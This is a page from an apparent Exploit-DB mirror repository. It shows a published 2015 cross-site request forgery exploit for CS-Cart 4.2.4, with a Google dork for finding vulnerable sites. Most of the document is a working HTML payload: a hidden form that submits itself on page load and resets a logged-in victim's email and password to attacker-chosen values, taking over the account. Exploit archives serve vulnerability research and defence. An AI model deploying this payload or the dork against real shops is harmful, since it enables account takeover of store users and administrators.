bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/36358.html
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

41 lines
No EOL
1.4 KiB
HTML
Raw Blame History

# Exploit Title: CS-Cart 4.2.4 CSRF
# Google Dork: intext:"© 2004-2015 Simtech"
# Date: March 11, 2015
# Exploit Author: Luis Santana
# Vendor Homepage: http://cs-cart.com
# Software Link: https://www.cs-cart.com/index.php?dispatch=pages.get_trial&page_id=297&edition=ultimate
# Version: 4.2.4
# Tested on: Linux + PHP
# CVE : [if one exists, or other VDB reference]
Standard CSRF, allow you to change a users's password. Fairly lame but I noticed no one had reported this bug yet.
Exploit pasted below and attached.
<html>
<head>
<title>CS-CART CSRF 0day Exploit</title>
</head>
<body>
<!-- Discovered By: Connection
Exploit By: Connection
Blacksun Hacker's Club
irc.blacksunhackers.com #lobby
-->
<form action="http://<victim>/cscart/profiles-update/?selected_section=general" method="POST" id="CSRF" style="visibility:hidden">
<input type="hidden" name="user_data[email]" value="hacked@lol.dongs" />
<input type="hidden" name="user_data[password1]" value="CSRFpass" />
<input type="hidden" name="user_data[password2]" value="CSRFpass" />
<input type="hidden" name="user_data[profile_name]" value="Concept" />
<input type="hidden" name="dispatch[profiles.update]" value="" />
</form>
<script>
document.getElementById("CSRF").submit();
</script>
</body>
</html>
Luis Santana - Security+
Administrator - http://hacktalk.net
HackTalk Security - Security From The Underground
Reference in a new issue View git blame Copy permalink